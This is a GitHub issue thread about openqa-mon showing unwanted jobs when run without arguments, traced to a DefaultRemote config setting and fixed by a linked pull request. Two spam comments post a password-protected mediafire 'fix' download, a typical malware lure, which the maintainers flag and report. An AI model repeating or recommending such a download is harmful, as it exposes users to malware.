### ISSUE TITLE
[openqa-mon] starting program without any option should give useful information

### ISSUE THREAD

**Issue by ilmanzo** [os-autoinst/openqa-mon#169]
When I start the program without any command line option I get a screen like this

![image](https://github.com/user-attachments/assets/23f68d56-f783-4284-9048-670650950478)

what are those tests and where they came from ? It may be a confusing UX since nobody asked to monitor those jobs.

a couple proposal for possibile more useful when user enters an empty command line:

- show the jobs from last time (this means we need to persist the previous query in some way)
- show help page and highlight the mandatory command line parameters

WDYT ?

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Martchus** [comment]
What weird response is that. That really sounds like someone completely unrelated to this project is trying to spread malware. If you agree, we should report/block the user and delete the comment.

The actual question I cannot answer but I also have no real opinion on what should happen on a call without arguments.

**Comment by ilmanzo** [comment]
> What weird response is that. That really sounds like someone completely unrelated to this project is trying to spread malware. If you agree, we should report/block the user and delete the comment.

yes I reported also the spam/malware to github, thanks 👍🏻  

> 
> The actual question I cannot answer but I also have no real opinion on what should happen on a call without arguments.

**Comment by grisu48** [comment]
@ilmanzo I cannot reproduce this issue, when I simply run `openqa-mon` then I get the help message (as it should be):

```
phoenix@racetrack-7290:~> openqa-mon
Usage: openqa-mon [OPTIONS] REMOTE
  REMOTE can be the directlink to a test (e.g. https://openqa.opensuse.org/t123)
  or a job range (e.g. https://openqa.opensuse.org/t123..125 or https://openqa.opensuse.org/t123+2)

OPTIONS

  -h, --help                       Print this help message
  --version                        Display program version
  -j, --jobs JOBS                  Display information only for the given JOBS
                                   JOBS can be a single job id, a comma separated list (e.g. 42,43,1337)
                                   or a job range (1335..1339 or 1335+4)
  -c,--continuous SECONDS          Continuously display stats, use rabbitmq if available otherwise status pulling
  -e,--exit                        Exit openqa-mon when all jobs are done (only in continuous mode)
                                   Return code is 0 if all jobs are passed or softfailing, 1 otherwise.
  -b,--bell                        Bell notification on job status changes
  -n,--notify                      Send desktop notifications on job status changes
  --no-bell                        Disable bell notification
  --no-notify                      Disable desktop notifications
  -m,--monitor                     Enable bell and desktop notifications
  -s,--silent                      Disable bell and desktop notifications

  -f,--follow                      Follow jobs, i.e. replace jobs by their clones if available
  --no-follow                      Don't follow jobs
  --rabbitmq                       Explicitly enable rabbitmq (experimental!!)
  --rabbit FILE                    Explicitly enable rabbitmq and load configurations from FILE
  --no-rabbit                      Don't use RabbitMQ, even if available
  -p,--hierarchy                   Show job hierarchy (i.e. children jobs)
  --hide-state STATES              Hide jobs with that are in the given state (e.g. 'running,assigned')

  --config FILE                    Read additional config file FILE
  -i, --input FILE                 Read jobs from FILE (additionally to stdin)

2023, https://github.com/grisu48/openqa-mon
```

Could you please post the command that gives you this screenshot?

**Comment by ilmanzo** [comment]
I guess is caused (and reproducible) by having a `DefaultRemote` entry in `openqa-mon.conf` :

```
## Default remote to use, if nothing is defined
DefaultRemote = http://openqa.opensuse.org
```

when I comment it, I get the help screen; when present, `openqa-mon` starts to fetch unwanted jobs from the remote. 

So could be feasible to just ignore that setting when command line is empty?

**Comment by grisu48** [comment]
https://github.com/os-autoinst/openqa-mon/pull/174 fixes this issue
